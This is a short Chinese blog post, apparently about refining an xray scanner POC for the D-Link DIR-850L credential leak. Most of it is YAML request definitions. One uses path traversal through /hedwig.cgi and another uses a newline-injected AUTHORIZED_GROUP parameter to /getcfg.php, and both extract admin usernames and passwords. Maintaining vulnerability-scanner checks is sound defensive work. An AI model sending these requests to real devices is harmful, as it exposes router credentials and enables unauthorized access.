xray插件改良3-poc-yaml-dlink-850l-info-leak

xray插件改良3-poc-yaml-dlink-850l-info-leak

前言

poc-yaml-dlink-850l-info-leak原始的yml
poc-yaml-dlink-850l-info-leak

name: poc-yaml-dlink-850l-info-leak
rules:
  - method: POST
    path: /hedwig.cgi
    headers:
      Content-Type: text/xml
      Cookie: uid=R8tBjwtFc8
    body: |-
      <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "Dir-850L"
  links:
    - https://xz.aliyun.com/t/2941

根据links的描述，信息泄露第一种方式是通过\n增加了一个全局变量导致的

所以最终的poc可以修改为

name: poc-yaml-dlink-850l-info-leak
groups:
  poc1:
    - method: POST
      path: /hedwig.cgi
      headers:
        Content-Type: text/xml
        Cookie: uid=R8tBjwtFc8
      body: |-
        <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
      follow_redirects: false
      expression: >
        response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
  poc2:
    - method: POST
      path: /getcfg.php
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |-
        SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1
      follow_redirects: false
      expression: >
        response.status == 200 && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "Dir-850L"
  links:
    - https://xz.aliyun.com/t/2941

后续

poc-yaml-dlink-cve-2019-17506就是检测这个的，只是拆分成了两个poc。
poc-yaml-dlink-cve-2020-9376-dump-credentials这个也是，起始都是一个问题，完全可以合并了检测。。